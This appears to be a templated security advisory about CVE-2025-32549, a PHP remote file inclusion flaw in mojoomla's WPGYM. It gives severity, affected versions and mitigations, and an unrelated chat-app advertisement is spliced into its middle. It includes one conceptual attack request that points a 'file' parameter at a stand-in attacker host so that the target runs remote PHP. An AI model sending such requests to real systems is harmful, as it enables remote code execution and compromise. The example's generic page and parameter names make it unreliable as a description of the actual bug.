Overview
This report provides an in-depth analysis of a significant vulnerability, CVE-2025-32549, affecting mojoomla’s WPGYM software. This vulnerability lies in the improper control of filename for Include/Require statement in the PHP program, leading to a potential PHP Remote File Inclusion. It holds importance due to its high severity score and the potential for system compromise or data leakage.
Vulnerability Summary
CVE ID: CVE-2025-32549
Severity: High (CVSS: 7.5)
Attack Vector: Network
Privileges Required: None
User Interaction: None
Impact: Potential system compromise or data leakage
Affected Products
Escape the Surveillance Era
Most apps won’t tell you the truth.
They’re part of the problem.
Phone numbers. Emails. Profiles. Logs.
It’s all fuel for surveillance.
Ameeba Chat gives you a way out.
- • No phone number
- • No email
- • No personal info
- • Anonymous aliases
- • End-to-end encrypted
Chat without a trace.
Product | Affected Versions
mojoomla WPGYM | n/a through 65.0
How the Exploit Works
The vulnerability stems from the software’s improper control of a filename in an Include/Require statement in a PHP program. This lack of control allows an attacker to manipulate the input to load a remote file. The attacker can then execute arbitrary PHP code, compromising the system or leading to potential data leakage.
Conceptual Example Code
The following is a conceptual HTTP request that an attacker might use to exploit this vulnerability:
GET /vulnerable_page.php?file=http://attacker.com/malicious_file.php HTTP/1.1
Host: target.example.com
In this case, the “file” parameter in the URL is vulnerable to file inclusion. The attacker can specify an arbitrary file, like “malicious_file.php” hosted on their server, leading to its execution on the target server.
Recommendation
To mitigate this vulnerability, users should apply the vendor’s patch as soon as it is available. In the meantime, Web Application Firewalls (WAF) or Intrusion Detection Systems (IDS) can be used as a temporary solution to detect and block such malicious requests.

